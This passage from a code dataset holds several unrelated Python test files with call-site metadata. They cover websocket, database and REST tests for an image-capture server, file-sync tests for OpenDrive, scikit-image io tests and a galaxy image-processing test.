{}), '(logger, result)', False, 'from internal import store_result\n'), ((167, 13, 167, 40), 'logging.getLogger', 'logging.getLogger', ({(167, 31, 167, 39): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((183, 4, 183, 32), 'internal.store_result', 'store_result', ({(183, 17, 183, 23): 'logger', (183, 25, 183, 31): 'result'}, {}), '(logger, result)', False, 'from internal import store_result\n'), ((192, 13, 192, 40), 'logging.getLogger', 'logging.getLogger', ({(192, 31, 192, 39): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((208, 4, 208, 32), 'internal.store_result', 'store_result', ({(208, 17, 208, 23): 'logger', (208, 25, 208, 31): 'result'}, {}), '(logger, result)', False, 'from internal import store_result\n'), ((230, 10, 230, 67), 'tools.kube_utils.get_pod_with_labels', 'get_pod_with_labels', ({(230, 30, 230, 66): '"""application=nova,component=compute"""'}, {}), "('application=nova,component=compute')", False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), ((233, 15, 233, 34), 'tools.kube_utils.kube_exec', 'kube_exec', ({(233, 25, 233, 28): 'pod', (233, 30, 233, 33): 'cmd'}, {}), '(pod, cmd)', False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), ((250, 18, 250, 55), 'tools.conf.settings.getValue', 'settings.getValue', ({(250, 36, 250, 54): '"""WORKER_ROLE_NAME"""'}, {}), "('WORKER_ROLE_NAME')", False, 'from tools.conf import settings\n'), ((282, 18, 282, 55), 'tools.conf.settings.getValue', 'settings.getValue', ({(282, 36, 282, 54): '"""WORKER_ROLE_NAME"""'}, {}), "('WORKER_ROLE_NAME')", False, 'from tools.conf import settings\n'), ((298, 14, 298, 91), 'tools.kube_utils.get_pod_with_labels', 'get_pod_with_labels', ({(298, 34, 298, 90): '"""application=openvswitch,component=openvswitch-vswitchd"""'}, {}), "('application=openvswitch,component=openvswitch-vswitchd')", False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), 
((301, 15, 301, 38), 'tools.kube_utils.kube_exec', 'kube_exec', ({(301, 25, 301, 32): 'ovs_pod', (301, 34, 301, 37): 'cmd'}, {}), '(ovs_pod, cmd)', False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), ((304, 12, 304, 50), 're.findall', 're.findall', ({(304, 23, 304, 39): '"""[a-zA-Z0-9-]+="""', (304, 41, 304, 49): 'response'}, {}), "('[a-zA-Z0-9-]+=', response)", False, 'import re\n'), ((307, 12, 307, 50), 're.findall', 're.findall', ({(307, 23, 307, 39): '""":[a-zA-Z0-9-]+"""', (307, 41, 307, 49): 'response'}, {}), "(':[a-zA-Z0-9-]+', response)", False, 'import re\n'), ((311, 13, 311, 33), 'json.loads', 'json.loads', ({(311, 24, 311, 32): 'response'}, {}), '(response)', False, 'import json\n'), ((328, 18, 328, 55), 'tools.conf.settings.getValue', 'settings.getValue', ({(328, 36, 328, 54): '"""WORKER_ROLE_NAME"""'}, {}), "('WORKER_ROLE_NAME')", False, 'from tools.conf import settings\n'), ((344, 14, 344, 91), 'tools.kube_utils.get_pod_with_labels', 'get_pod_with_labels', ({(344, 34, 344, 90): '"""application=openvswitch,component=openvswitch-vswitchd"""'}, {}), "('application=openvswitch,component=openvswitch-vswitchd')", False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), ((347, 15, 347, 38), 'tools.kube_utils.kube_exec', 'kube_exec', ({(347, 25, 347, 32): 'ovs_pod', (347, 34, 347, 37): 'cmd'}, {}), '(ovs_pod, cmd)', False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), ((350, 12, 350, 50), 're.findall', 're.findall', ({(350, 23, 350, 39): '"""[a-zA-Z0-9-]+="""', (350, 41, 350, 49): 'response'}, {}), "('[a-zA-Z0-9-]+=', response)", False, 'import re\n'), ((353, 12, 353, 50), 're.findall', 're.findall', ({(353, 23, 353, 39): '""":[a-zA-Z0-9-]+"""', (353, 41, 353, 49): 'response'}, {}), "(':[a-zA-Z0-9-]+', response)", False, 'import re\n'), ((357, 13, 357, 33), 'json.loads', 'json.loads', ({(357, 24, 357, 32): 'response'}, {}), '(response)', False, 'import json\n'), ((374, 18, 374, 55), 'tools.conf.settings.getValue', 'settings.getValue', ({(374, 36, 374, 54): '"""WORKER_ROLE_NAME"""'}, {}), "('WORKER_ROLE_NAME')", False, 'from tools.conf import settings\n'), ((391, 18, 391, 55), 'tools.conf.settings.getValue', 'settings.getValue', ({(391, 36, 391, 54): '"""WORKER_ROLE_NAME"""'}, {}), "('WORKER_ROLE_NAME')", False, 'from tools.conf import settings\n'), ((416, 18, 416, 55), 'tools.conf.settings.getValue', 'settings.getValue', ({(416, 36, 416, 54): '"""WORKER_ROLE_NAME"""'}, {}), "('WORKER_ROLE_NAME')", False, 'from tools.conf import settings\n'), ((446, 10, 446, 39), 'tools.conf.settings.getValue', 'settings.getValue', ({(446, 28, 446, 38): '"""pdf_file"""'}, {}), "('pdf_file')", False, 'from tools.conf import settings\n'), ((479, 10, 479, 39), 'tools.conf.settings.getValue', 'settings.getValue', ({(479, 28, 479, 38): '"""pdf_file"""'}, {}), "('pdf_file')", False, 'from tools.conf import settings\n'), ((576, 10, 576, 67), 'tools.kube_utils.get_pod_with_labels', 'get_pod_with_labels', ({(576, 30, 576, 66): '"""application=nova,component=compute"""'}, {}), "('application=nova,component=compute')", False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), ((579, 15, 579, 34), 'tools.kube_utils.kube_exec', 'kube_exec', ({(579, 25, 579, 28): 'pod', (579, 30, 579, 33): 'cmd'}, {}), '(pod, cmd)', False, 'from tools.kube_utils import kube_exec, get_pod_with_labels\n'), ((581, 13, 581, 40), 'configparser.ConfigParser', 'configparser.ConfigParser', ({}, {}), '()', False, 'import configparser\n'), ((494, 12, 494, 41), 
'tools.conf.settings.getValue', 'settings.getValue', ({(494, 30, 494, 40): '"""pdf_file"""'}, {}), "('pdf_file')", False, 'from tools.conf import settings\n'), ((507, 24, 507, 53), 'tools.conf.settings.getValue', 'settings.getValue', ({(507, 42, 507, 52): '"""pdf_file"""'}, {}), "('pdf_file')", False, 'from tools.conf import settings\n'), ((519, 25, 519, 54), 'tools.conf.settings.getValue', 'settings.getValue', ({(519, 43, 519, 53): '"""pdf_file"""'}, {}), "('pdf_file')", False, 'from tools.conf import settings\n'), ((542, 24, 542, 53), 'tools.conf.settings.getValue', 'settings.getValue', ({(542, 42, 542, 52): '"""pdf_file"""'}, {}), "('pdf_file')", False, 'from tools.conf import settings\n')]
juhnowski/FishingRod
production/pygsl-0.9.5/testing/__init__.py
457e7afb5cab424296dff95e1acf10ebf70d32a9
""" Here you find either new implemented modules or alternate implementations of already modules. This directory is intended to have a second implementation beside the main implementation to have a discussion which implementation to favor on the long run. """
[]
Cyberlightning/2D-3DCapture
PythonServer/UnitTestCasesForWebSocket.py
e5fdcec4f25358fc1964068180e4e774f45daa8a
''' Created on Mar 6, 2014 @author: tharanga ''' import unittest from time import sleep import EventService as es from EventService import WebSocketServer as ws from EventService import EventManager as em import socket from base64 import b64encode import struct import MySQLdb import json import EventService import flaskr import tempfile def encodeMessage( message): message = b64encode(message) b1 =0x80 | 0x1 & 0x0f b2 = 0 header="" payload_len = len(message) if payload_len < 126 : header = struct.pack('>BB', b1, payload_len) message= header +message elif (payload_len < ((2 ** 16) - 1)): b2 |= 126 header += chr(b1) header += chr(b2) l = struct.pack(">H", payload_len) header += l message = header +message else: b2 |= 127 header += chr(b1) header += chr(b2) l = struct.pack(">Q", payload_len) header += l message = header +message return message class TestWebSockets(unittest.TestCase): def setUp(self): self.wsServer = ws('',12345,'127.0.0.1') self.wsServer.setRunning(True); sleep(1) self.testsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.testsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Create a socket object host = 'localhost' # Get local machine name port = 12345 self.testsocket.connect((host, port)) def tearDown(self): self.wsServer.closeConnection(); self.testsocket.close() sleep(1) def test_webSocketServerOBject(self): self.assertEqual(self.wsServer.SERVER, '', "Server set to the desired value") self.assertEqual(self.wsServer.PORT, 12345, "Server port is set correctly") self.assertEqual(self.wsServer.LOCALHOST, "127.0.0.1", "Localhost set to 127.0.0.1") def test_invalid_Request(self): message= "Test Message" self.testsocket.send(message) data = repr(self.testsocket.recv(1024)) #print 'Response to invalid message<TestMessage> %s'%(data) self.assertEqual(data, '\'CONNECTION_REJECTED\'', "Invalid Message rejected") def test_valid_WS_Request(self): message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n" # message = "Test message" self.testsocket.sendall(message) wsresponse = repr(self.testsocket.recv(1024)) #print 'Response to valid ws request %s'%wsresponse self.assertNotEqual(wsresponse, '\'CONNECTION_REJECTED\'', "Connection is not rejected") self.assertIsNotNone(wsresponse, "Connection Response is not Empty") self.testsocket.sendall(("Test Message")) data = repr(self.testsocket.recv(1024)) #print 'Response to un encoded Request %s'%(data) self.assertEqual(data, "\'Un expected opcode\'", "In valid Message rejected") def test_invalid_Messge(self): message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n" self.testsocket.sendall(message) wsresponse = repr(self.testsocket.recv(1024)) sleep(1) self.testsocket.sendall("Test Message") data = repr(self.testsocket.recv(1024)) self.assertEqual(data, "\'Un expected opcode\'", "In valid Message rejected") def test_malformed_Message(self): message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n" self.testsocket.sendall(message) wsresponse = repr(self.testsocket.recv(1024)) # print wsresponse 
self.testsocket.send(encodeMessage("Test Message"))#This line seems to get stuck at times. Solution is to use sendAll, use \n at the end data = repr(self.testsocket.recv(1024)) self.assertEqual(data, "\'MISFORMATED MESSAGE\'", "Messages with out a type is rejected") def test_wellformed_Message_for_Text(self): message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n" self.testsocket.sendall(message) wsresponse = repr(self.testsocket.recv(1024)) # print wsresponse self.testsocket.send(encodeMessage("1<---->Test Message"))#This line seems to get stuck at times. Solution is to use sendAll, use \n at the end data = repr(self.testsocket.recv(1024)) print data self.assertEqual(data, "\'Text received\'", "Text Messages is identified and accepted") def test_wellformed_Message_for_Json(self): message = "GET /mychat HTTP/1.1\nHost: server.example.com\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\nSec-WebSocket-Protocol: chat\nSec-WebSocket-Version: 13\nOrigin: localhost\n\n" self.testsocket.sendall(message) wsresponse = repr(self.testsocket.recv(1024)) self.testsocket.send(encodeMessage("2<---->Test Message"))#This line seems to get stuck at times. Solution is to use sendAll, use \n at the end data = repr(self.testsocket.recv(1024)) # print data self.assertEqual(data, "\'json is received\'", "json Messages is identified and accepted") ##TO RUN THE FOLLOWING UNIT TESTS IT IS EXPECTED HAVE THE DATABASE ##CREATED. DATABASE SCRIPT IS PROVIDED TO CREATE THE NECESSARY DATABASES AND TABLES ##ASSISCIATED DATA IS NOT PROVIDED. class TestDatabase(unittest.TestCase): def setUp(self): self.connection = es.dbConnect() def tearDown(self): self.connection.close() def test_data_insert_data_Read(self): self.assertIsInstance(self.connection, MySQLdb.connection, "Database connection accurately set") jsondata ={"type":"image", "time":"2014.3.4_14.40.30", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4583105, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800} alt = str(jsondata["position"]["alt"]); if alt=="None": alt = '0' heading = '0' speed = '0' width = jsondata["vwidth"] height =jsondata["vheight"] if width > height : screenorientation= 1.00#landscape else : screenorientation= 0.00#potrait filename = jsondata["type"]+"_"+jsondata["time"]+"."+jsondata["ext"] sqlstring1 = "INSERT INTO Imagedata values (\'"+filename+"\',GeomFromText ('POINT("+ str(jsondata["position"]["lat"])+" "+str(jsondata["position"]["lon"])+")'),"+str(jsondata["position"]["alt"])+","+str(jsondata["position"]["acc"]) sqlstring2 =","+str(jsondata["device"]["gx"])+","+str(jsondata["device"]["gy"])+","+str(jsondata["device"]["gz"]) sqlstring3 = ","+str(jsondata["device"]["ra"])+","+str(jsondata["device"]["rb"])+","+str(jsondata["device"]["rg"])+","+str(screenorientation)+",\'"+jsondata["device"]["orientation"]+"\',now(),\'"+str(jsondata["deviceOS"])+"\',\'"+str(jsondata["browsertype"])+"\',\'"+str(jsondata["deviceType"])+"\');" sqlstring = sqlstring1 + sqlstring2+ sqlstring3 #print(sqlstring) es.dbInsert(sqlstring) sqlreadsting = 'select imagename, Browser,devicetype,X(location) as latitude, Y(location) as longitude from Imagedata 
where time=\'2014.3.4_14.40.31\'' result = es.dbRead(sqlreadsting) self.assertIsNotNone(result, "Inserted data is retrieved and it is not null") for row in result: self.assertEqual(row[0], "image_2014.3.4_14.40.30.png", "Image name is correctly set and saved") self.assertEqual(row[1], 65.0600797, "Latitudes are saved") self.assertEqual(row[2], 25.4583105, "Longitude are saved") HOST = '127.0.0.1' # The remote host PORT = 17322 class RestServerTestCase(unittest.TestCase): def setUp(self): self.db_fd, flaskr.app.config['DATABASE'] = tempfile.mkstemp() EventService.app.config['TESTING'] = True self.app = EventService.app.test_client() flaskr.init_db() #self.socketServer = self.app.WebSocketServer('',wsport,'127.0.0.1') def test_rootpath(self): rv = self.app.get('/') assert 'This is a REST Service for 2D3DCapture Server.' in rv.data def test_post_image(self): rv = self.app.post('/postImage') assert 'READY' in rv.data def test_clossing_websocket(self): rv =self.app.post('/closewebsocketserver') assert 'CLOSED' or 'ALREADY_CLOSSED' in rv.data def test_start_websocket(self): rv =self.app.get('/startwebsocketserver') # print rv.data assert 'READY' in rv.data def test_post_binary_image(self): rv =self.app.post('/postBinaryImage') assert 'READY' or '415 Unsupported Media Type' in rv.data def test_get_All_Image_Data(self): rv =self.app.get('/getAllImageData') jsonmsg = json.loads(rv.data) self.assertIsNotNone(jsonmsg['imageList'] , "getImageData returns a non None list") def test_get_location_Image_Data(self): rv =self.app.get('/getLocationImageData?lat=65.0600797&lon=25.4583105') jsonmsg = json.loads(rv.data) self.assertIsNotNone(jsonmsg['imageList'] , "getLocationImageData returns a non None list.This is a feature test for location based image data") def test_closest_Image_retrieval(self): jsondata1 ={"type":"image", "time":"2014.3.4_14.40.31", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4583105, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800} jsondata2 ={"type":"image", "time":"2014.3.4_14.40.32", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4582115, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800} jsondata3 ={"type":"image", "time":"2014.3.4_14.40.33", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4584104, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800} jsondata4 ={"type":"image", "time":"2014.3.4_14.40.34", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4586115, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800} jsondata5 ={"type":"image", "time":"2014.3.4_14.40.35", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4587125, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, 
"device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800} jsondata6 ={"type":"image", "time":"2014.3.4_14.40.36", "ext":"png", "deviceType":"Mobile", "deviceOS":"Badda", "browsertype":"Firefox", "position":{"lon":25.4588125, "lat":65.0600797, "alt":-1000, "acc":48.38800048828125}, "device":{"ax":0, "ay":0, "az":0, "gx":0, "gy":0, "gz":0, "ra":210.5637, "rb":47.5657, "rg":6.9698, "orientation":"potrait"}, "vwidth":480, "vheight":800} es.saveData(jsondata1) es.saveData(jsondata2) es.saveData(jsondata3) es.saveData(jsondata4) es.saveData(jsondata5) es.saveData(jsondata6) radius = 0.0001 photoList = es.getClosestImages( 65.0601787, 25.4583107, radius ) self.assertEqual(len(photoList), 4, "Length of the list should be equal of the first test") for row in photoList: assert 'image_2014.3.4_14.40.32.png' or 'image_2014.3.4_14.40.31.png' in row[0] photoList2 = es.getClosestImages( 65.0601787, 25.4587107, radius ) self.assertEqual(len(photoList2), 2, "Length of the list should be equal of the second test") for row in photoList2: assert 'image_2014.3.4_14.40.34.png' or 'image_2014.3.4_14.40.35.png' in row[0] def suite(): testsuit =unittest.TestSuite() testsuit.addTest(TestWebSockets('test_webSocketServerOBject')) testsuit.addTest(TestWebSockets('test_valid_WS_Request')) testsuit.addTest(TestWebSockets('test_invalid_Messge')) testsuit.addTest(TestWebSockets('test_invalid_Request')) testsuit.addTest(TestWebSockets('test_malformed_Message')) testsuit.addTest(TestWebSockets('test_wellformed_Message_for_Text')) testsuit.addTest(TestWebSockets('test_wellformed_Message_for_Json')) testsuit.addTest(TestDatabase('test_data_insert_data_Read')) testsuit.addTest(RestServerTestCase('test_rootpath')) testsuit.addTest(RestServerTestCase('test_post_image')) testsuit.addTest(RestServerTestCase('test_start_websocket')) testsuit.addTest(RestServerTestCase('test_clossing_websocket')) testsuit.addTest(RestServerTestCase('test_post_binary_image')) testsuit.addTest(RestServerTestCase('test_get_All_Image_Data')) testsuit.addTest(RestServerTestCase('test_closest_Image_retrieval')) return testsuit suite = suite() runner = unittest.TextTestRunner(verbosity=3) runner.run(suite) # if __name__ == "__main__": # #import sys;sys.argv = ['', 'Test.testName'] # unittest.main()
[]
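A small sanity check for the framing helper in the record above — a hypothetical sketch that assumes encodeMessage and struct are in scope (i.e. run inside that Python 2 module); the payload and expected bytes are illustrative:

# Hypothetical sketch: the helper base64-encodes the payload, then prepends a
# two-byte header (FIN + text opcode -> 0x81, followed by the 7-bit payload length).
frame = encodeMessage("hi")                      # b64encode("hi") == "aGk=" (4 bytes)
assert frame[:2] == struct.pack('>BB', 0x81, 4)  # header bytes
assert frame[2:] == "aGk="                       # framed payload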
JulianSobott/OpenDrive
src/tests/client_side/test_main.py
0593c994c3bccccc4351557c42d13f3535b6b6c1
import os import threading import time import unittest from OpenDrive.client_side import file_changes_json as c_json from OpenDrive.client_side import interface from OpenDrive.client_side import main from OpenDrive.client_side import paths as client_paths from OpenDrive.server_side import paths as server_paths from tests.client_side.helper_client import h_register_dummy_user_device_client from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, \ h_clear_init_all_folders, h_create_empty class TestMain(unittest.TestCase): def setUp(self) -> None: h_clear_init_all_folders() self._server_process = h_start_server_process() self.folder1_abs_local_path = client_paths.normalize_path(client_paths.LOCAL_CLIENT_DATA, "folder1") h_create_empty(self.folder1_abs_local_path) main.MIN_UPDATE_PAUSE_TIME = 1 def tearDown(self) -> None: main.shutdown() h_stop_server_process(self._server_process) @h_client_routine(clear_folders=False) def putest_start_logged_in(self): user = h_register_dummy_user_device_client() main_thread = threading.Thread(target=main.start, daemon=True) main_thread.start() time.sleep(2) # wait till changes.json is created interface.add_sync_folder(self.folder1_abs_local_path, "folder1") expected_content = c_json.get_all_data() file_path = os.path.join(self.folder1_abs_local_path, "dummy.txt") with open(file_path, "w") as f: f.write("Hello World") time.sleep(5) # wait till synchronization finished expected_path = os.path.join(server_paths.get_users_root_folder(user.user_id), "folder1/dummy.txt") self.assertTrue(os.path.exists(expected_path), "dummy file is not pulled to server!") self.assertEqual(expected_content, c_json.get_all_data()) time.sleep(1) # wait till waiting...
[((29, 5, 29, 42), 'tests.helper_all.h_client_routine', 'h_client_routine', (), '', False, 'from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, h_clear_init_all_folders, h_create_empty\n'), ((19, 8, 19, 34), 'tests.helper_all.h_clear_init_all_folders', 'h_clear_init_all_folders', ({}, {}), '()', False, 'from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, h_clear_init_all_folders, h_create_empty\n'), ((20, 31, 20, 55), 'tests.helper_all.h_start_server_process', 'h_start_server_process', ({}, {}), '()', False, 'from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, h_clear_init_all_folders, h_create_empty\n'), ((21, 38, 21, 108), 'OpenDrive.client_side.paths.normalize_path', 'client_paths.normalize_path', ({(21, 66, 21, 96): 'client_paths.LOCAL_CLIENT_DATA', (21, 98, 21, 107): '"""folder1"""'}, {}), "(client_paths.LOCAL_CLIENT_DATA, 'folder1')", True, 'from OpenDrive.client_side import paths as client_paths\n'), ((22, 8, 22, 51), 'tests.helper_all.h_create_empty', 'h_create_empty', ({(22, 23, 22, 50): 'self.folder1_abs_local_path'}, {}), '(self.folder1_abs_local_path)', False, 'from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, h_clear_init_all_folders, h_create_empty\n'), ((26, 8, 26, 23), 'OpenDrive.client_side.main.shutdown', 'main.shutdown', ({}, {}), '()', False, 'from OpenDrive.client_side import main\n'), ((27, 8, 27, 51), 'tests.helper_all.h_stop_server_process', 'h_stop_server_process', ({(27, 30, 27, 50): 'self._server_process'}, {}), '(self._server_process)', False, 'from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, h_clear_init_all_folders, h_create_empty\n'), ((31, 15, 31, 52), 'tests.client_side.helper_client.h_register_dummy_user_device_client', 'h_register_dummy_user_device_client', ({}, {}), '()', False, 'from tests.client_side.helper_client import h_register_dummy_user_device_client\n'), ((32, 22, 32, 70), 'threading.Thread', 'threading.Thread', (), '', False, 'import threading\n'), ((34, 8, 34, 21), 'time.sleep', 'time.sleep', ({(34, 19, 34, 20): '(2)'}, {}), '(2)', False, 'import time\n'), ((36, 8, 36, 73), 'OpenDrive.client_side.interface.add_sync_folder', 'interface.add_sync_folder', ({(36, 34, 36, 61): 'self.folder1_abs_local_path', (36, 63, 36, 72): '"""folder1"""'}, {}), "(self.folder1_abs_local_path, 'folder1')", False, 'from OpenDrive.client_side import interface\n'), ((37, 27, 37, 48), 'OpenDrive.client_side.file_changes_json.get_all_data', 'c_json.get_all_data', ({}, {}), '()', True, 'from OpenDrive.client_side import file_changes_json as c_json\n'), ((38, 20, 38, 74), 'os.path.join', 'os.path.join', ({(38, 33, 38, 60): 'self.folder1_abs_local_path', (38, 62, 38, 73): '"""dummy.txt"""'}, {}), "(self.folder1_abs_local_path, 'dummy.txt')", False, 'import os\n'), ((41, 8, 41, 21), 'time.sleep', 'time.sleep', ({(41, 19, 41, 20): '(5)'}, {}), '(5)', False, 'import time\n'), ((45, 8, 45, 21), 'time.sleep', 'time.sleep', ({(45, 19, 45, 20): '(1)'}, {}), '(1)', False, 'import time\n'), ((42, 37, 42, 85), 'OpenDrive.server_side.paths.get_users_root_folder', 'server_paths.get_users_root_folder', ({(42, 72, 42, 84): 'user.user_id'}, {}), '(user.user_id)', True, 'from OpenDrive.server_side import paths as server_paths\n'), ((43, 24, 43, 53), 'os.path.exists', 'os.path.exists', ({(43, 39, 43, 52): 'expected_path'}, {}), '(expected_path)', False, 'import os\n'), ((44, 
43, 44, 64), 'OpenDrive.client_side.file_changes_json.get_all_data', 'c_json.get_all_data', ({}, {}), '()', True, 'from OpenDrive.client_side import file_changes_json as c_json\n')]
oz90210/Pyto
site-packages/skimage/io/tests/test_io.py
59f185149b71e57e5debeb1c9a61a28739e81720
import os import numpy as np from skimage import io, data_dir from skimage._shared import testing from skimage._shared.testing import assert_array_equal one_by_one_jpeg = ( b'\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01' b'\x00\x01\x00\x00\xff\xdb\x00C\x00\x03\x02\x02\x02\x02' b'\x02\x03\x02\x02\x02\x03\x03\x03\x03\x04\x06\x04\x04' b'\x04\x04\x04\x08\x06\x06\x05\x06\t\x08\n\n\t\x08\t\t' b'\n\x0c\x0f\x0c\n\x0b\x0e\x0b\t\t\r\x11\r\x0e\x0f\x10' b'\x10\x11\x10\n\x0c\x12\x13\x12\x10\x13\x0f\x10\x10' b'\x10\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11' b'\x00\xff\xc4\x00\x14\x00\x01\x00\x00\x00\x00\x00\x00' b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\xff\xc4\x00' b'\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' b'\x00\x00\x00\x00\x00\x00\xff\xda\x00\x08\x01\x01\x00' b'\x00?\x00*\x9f\xff\xd9' ) def test_stack_basic(): x = np.arange(12).reshape(3, 4) io.push(x) assert_array_equal(io.pop(), x) def test_stack_non_array(): with testing.raises(ValueError): io.push([[1, 2, 3]]) def test_imread_file_url(): # tweak data path so that file URI works on both unix and windows. data_path = data_dir.lstrip(os.path.sep) data_path = data_path.replace(os.path.sep, '/') image_url = 'file:///{0}/camera.png'.format(data_path) image = io.imread(image_url) assert image.shape == (512, 512) def test_imread_http_url(httpserver): # httpserver is a fixture provided by pytest-localserver # https://bitbucket.org/pytest-dev/pytest-localserver/ httpserver.serve_content(one_by_one_jpeg) # it will serve anything you provide to it on its url. # we add a /test.jpg so that we can identify the content # by extension image = io.imread(httpserver.url + '/test.jpg' + '?' + 's' * 266) assert image.shape == (1, 1)
[((27, 4, 27, 14), 'skimage.io.push', 'io.push', ({(27, 12, 27, 13): 'x'}, {}), '(x)', False, 'from skimage import io, data_dir\n'), ((39, 16, 39, 44), 'skimage.data_dir.lstrip', 'data_dir.lstrip', ({(39, 32, 39, 43): 'os.path.sep'}, {}), '(os.path.sep)', False, 'from skimage import io, data_dir\n'), ((42, 12, 42, 32), 'skimage.io.imread', 'io.imread', ({(42, 22, 42, 31): 'image_url'}, {}), '(image_url)', False, 'from skimage import io, data_dir\n'), ((53, 12, 53, 69), 'skimage.io.imread', 'io.imread', ({(53, 22, 53, 68): "httpserver.url + '/test.jpg' + '?' + 's' * 266"}, {}), "(httpserver.url + '/test.jpg' + '?' + 's' * 266)", False, 'from skimage import io, data_dir\n'), ((29, 23, 29, 31), 'skimage.io.pop', 'io.pop', ({}, {}), '()', False, 'from skimage import io, data_dir\n'), ((33, 9, 33, 35), 'skimage._shared.testing.raises', 'testing.raises', ({(33, 24, 33, 34): 'ValueError'}, {}), '(ValueError)', False, 'from skimage._shared import testing\n'), ((34, 8, 34, 28), 'skimage.io.push', 'io.push', ({(34, 16, 34, 27): '[[1, 2, 3]]'}, {}), '([[1, 2, 3]])', False, 'from skimage import io, data_dir\n'), ((26, 8, 26, 21), 'numpy.arange', 'np.arange', ({(26, 18, 26, 20): '12'}, {}), '(12)', True, 'import numpy as np\n')]
EmilioCC/gti770-student-framework
tests/core/feature_extraction/test_galaxyProcessor.py
3cd72da8fe78c7ecfc26c9e688cbe1b7deee353a
#!/usr/bin/env python # -*- coding: utf-8 -*- import os import numpy as np from unittest import TestCase from core.feature_extraction.galaxy.galaxy_processor import GalaxyProcessor from commons.helpers.dataset.strategies.galaxy_dataset.label_strategy import GalaxyDataSetLabelStrategy from commons.helpers.dataset.context import Context class TestGalaxyProcessor(TestCase): def setUp(self): validation_size = 0.2 # Get the ground truth CSV file from script's parameters. self.galaxy_csv_file = os.environ["VIRTUAL_ENV"] + "/data/csv/galaxy/galaxy.csv" self.galaxy_images_path = os.environ["VIRTUAL_ENV"] + "/data/images/" # Create instance of data set loading strategies. galaxy_label_data_set_strategy = GalaxyDataSetLabelStrategy() # Set the context to galaxy label data set loading strategy. context = Context(galaxy_label_data_set_strategy) context.set_strategy(galaxy_label_data_set_strategy) self.label_dataset = context.load_dataset(csv_file=self.galaxy_csv_file, one_hot=False, validation_size=np.float32(validation_size)) def testGalaxyProcessor(self): # Process galaxies. galaxy_processor = GalaxyProcessor(self.galaxy_images_path) #features = galaxy_processor.process_galaxy(self.label_dataset)
